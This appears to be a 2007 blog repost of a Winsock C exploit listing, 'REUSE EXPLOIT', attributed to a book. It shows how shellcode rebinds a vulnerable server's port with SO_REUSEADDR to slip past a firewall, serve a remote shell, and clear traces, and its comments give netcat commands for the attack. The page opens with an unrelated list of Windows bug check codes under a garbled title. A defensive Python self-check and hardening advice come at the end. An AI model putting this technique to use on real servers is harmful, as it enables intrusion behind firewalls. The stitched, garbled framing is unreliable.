UpdatesBenefits of BIOS,Destroy All!!!

(2007-07-24 11:38:19)
Bug Check 0x1E: KMODE_EXCEPTION_NOT_HANDLED
Bug Check 0x0A: IRQL_NOT_LESS_OR_EQUAL
Bug Check 0x2E: DATA_BUS_ERROR
Bug Check 0x7B: INACCESSIBLE_BOOT_DEVICE
Bug Check 0x7F: UNEXPECTED_KERNEL_MODE_TRAP
Bug Check 0x50: PAGE_FAULT_IN_NONPAGED_AREA
Bug Check 0x77: KERNEL_STACK_INPAGE_ERROR
Bug Check 0x7A: KERNEL_DATA_INPAGE_ERROR
Exception Code 0xC0000221: STATUS_IMAGE_CHECKSUM_MISMATCH
/*----------------------------------------------------------------------------
 *
 * REUSE EXPLOIT
 * =============
 * General idea
 * ------------
 * To bypass the firewall, connect to the port that has already been opened by
 * the attacked process, and rebind it. All further connections to the server
 * must then be processed by your own code. To achieve this it is enough to set
 * SO_REUSEADDR on the socket.
 *
 * Implementation
 * --------------
 * Create a new socket, call setsockopt, then bind, and from there on
 * everything goes as usual.
 *
 * Problems
 * --------
 * Under w2k (and possibly under other operating systems) there is some
 * probability that the socket reuse will fail and control is passed to the
 * previous socket owner instead of the shellcode. The hacker then has to
 * repeat the attempt.
 *
 * Demonstration
 * -------------
 * Start this exploit on the attacked computer and connect to it using telnet
 * from the attacker host (this step corresponds to the connection to the
 * vulnerable server and passing the shellcode). Now connect to the target
 * host again. If everything goes OK, you'll receive the remote shell even if
 * the firewall configuration is highly restrictive.
 *
 * > Target:   reuse.exe
 * > Attacker: netcat "target_address" 80  <- sending shellcode
 * > Attacker: netcat "target_address" 80  <- passing commands to the shell
 *----------------------------------------------------------------------------*/
#include <stdio.h>
#include <winsock2.h>
#include <windows.h>
#include "spawn.h"   // supplies MAX_BUF_SIZE and sshell(); not part of this listing

#pragma comment(lib, "ws2_32.lib") // Winsock import library (MSVC)

#define V_PORT 80 // Port of the vulnerable application

int main(void)
{
    int n_reuse = 1;                  // non-zero value enables SO_REUSEADDR
    WSADATA wsa;
    SOCKET lsocket, rsocket, csocket;
    struct sockaddr_in laddr, raddr, taddr;
    int raddr_size = sizeof(raddr);
    int taddr_size = sizeof(taddr);

    printf("exploit reuse socket demo\n");

    // THIS CODE IS EXECUTED BY THE VULNERABLE SERVER (FOR EXAMPLE, A WEB SERVER)
    // TO WHICH THE ATTACKER ESTABLISHES A CONNECTION AND PASSES THE SHELLCODE
    // TO WHICH CONTROL WILL LATER BE PASSED.
    //-------------------------------------------------------------------------
    // Step 0: Initialization of the sockets library
    if (WSAStartup(0x0202, &wsa)) return -1;

    // Step 0: Creating a socket
    lsocket = socket(AF_INET, SOCK_STREAM, 0);
    if (lsocket == INVALID_SOCKET) return -1;

    // Step 0: Binding the socket to the local address
    laddr.sin_family      = AF_INET;
    laddr.sin_port        = htons(V_PORT);
    laddr.sin_addr.s_addr = INADDR_ANY;
    if (bind(lsocket, (struct sockaddr *) &laddr, sizeof(laddr))) return -1;

    // Step 0: Listening
    if (listen(lsocket, 0x10)) return -1;
    printf("server waits for connection on port %d...\n", V_PORT);

    // Step 0: Retrieve a connection from the queue
    // _without_ saving the returned socket descriptor, because
    // the shellcode would be unable to access it anyway
    accept(lsocket, (struct sockaddr *) &taddr, &taddr_size);
    //========================================================================
    // END OF THE SERVER CODE

    //
    // ...
    //

    /*  SHELL_CODE_ENTRY_POINT */
    // THE SHELLCODE ENTRY POINT:
    // FROM HERE THE SHELLCODE GETS CONTROL.
    // ALTHOUGH ITS CONNECTION TO THE HACKER'S COMPUTER HAS ALREADY BEEN ESTABLISHED,
    // THE SHELLCODE KNOWS NOTHING ABOUT THE SOCKET DESCRIPTOR OF THAT CONNECTION.
    // THEREFORE IT BINDS THE VULNERABLE PORT AGAIN, CAPTURING _FURTHER_ CONNECTIONS.
    //-----------------------------------------------------------------------

    // Step 1: Creating a socket
    rsocket = socket(AF_INET, SOCK_STREAM, 0);
    if (rsocket == INVALID_SOCKET) return -1;

    // Step 2: Changing socket attributes to SO_REUSEADDR
    if (setsockopt(rsocket, SOL_SOCKET, SO_REUSEADDR,
                   (char *) &n_reuse, sizeof(n_reuse))) return -1;

    // Step 3: Binding the socket to the local address
    raddr.sin_family      = AF_INET;
    raddr.sin_port        = htons(V_PORT); // Vulnerable port
    raddr.sin_addr.s_addr = INADDR_ANY;
    if (bind(rsocket, (struct sockaddr *) &raddr, sizeof(raddr))) return -1;

    // Step 4: Listening
    // On further connections to the vulnerable port, control will be passed
    // to the shellcode instead of the server code, and this port is already
    // open at the firewall because the firewall considers it the legitimate
    // port of a network service.
    if (listen(rsocket, 0x1)) return -1;

    // Step 5: Retrieve a connection from the queue
    csocket = accept(rsocket, (struct sockaddr *) &raddr, &raddr_size);
    if (csocket == INVALID_SOCKET) return -1;

    // Step 6: Exchange commands over the socket
    sshell((SOCKET) csocket, MAX_BUF_SIZE);

    // Step 7: clear the traces of the hacker's activity
    closesocket(rsocket);
    closesocket(csocket);

    // END OF THE SHELLCODE
    //========================================================================

    //
    // ...
    //

    // RETURNING TO THE SERVER CODE
    //------------------------------------------------------------------------
    // Clear all traces of the hacking activity
    closesocket(lsocket);
    WSACleanup();

    return 0;
}

// Source: http://cdcontent.books24x7.com/id_13466/reuse.c
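A defender-side self-check, added here and not part of the book's reuse.c listing: it opens a listener on an ephemeral loopback port, then attempts the same SO_REUSEADDR rebind that the shellcode above performs, and reports whether the platform lets a second socket take over the port. With `exclusive=True` the listener is opened with SO_EXCLUSIVEADDRUSE, the Windows socket option that refuses such a rebind. It is written in Python instead of Winsock C so that it runs unchanged on Windows and on Linux/BSD; the function names are mine.

```python
import socket


def open_listener(host="127.0.0.1", exclusive=False):
    """Open a listening TCP socket on an ephemeral port; return (socket, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    if exclusive and hasattr(socket, "SO_EXCLUSIVEADDRUSE"):
        # Windows-only hardening: once set, no other socket may bind this
        # address, even one that sets SO_REUSEADDR (the rebind reuse.c relies on).
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_EXCLUSIVEADDRUSE, 1)
    srv.bind((host, 0))          # port 0: let the OS pick a free port
    srv.listen(1)
    return srv, srv.getsockname()[1]


def port_hijackable(exclusive=False, host="127.0.0.1"):
    """True if a second socket with SO_REUSEADDR can bind a port that a live
    listener already owns, i.e. the condition the reuse exploit depends on.

    Linux/BSD refuse the bind while a listener is active; classic Windows
    may allow it unless the listener was opened with SO_EXCLUSIVEADDRUSE."""
    srv, port = open_listener(host, exclusive)
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        probe.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        probe.bind((host, port))   # the same rebind step as reuse.c, step 3
        return True
    except OSError:                # EADDRINUSE / WSAEACCES: the port is protected
        return False
    finally:
        probe.close()
        srv.close()


if __name__ == "__main__":
    print("rebind of a plain listener possible:    ", port_hijackable())
    print("rebind of an exclusive listener possible:", port_hijackable(exclusive=True))
```

Run it on the host whose service you want to assess: a `True` for the plain listener means a process that accepts attacker-controlled input on that port should be opening its socket with SO_EXCLUSIVEADDRUSE.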
 
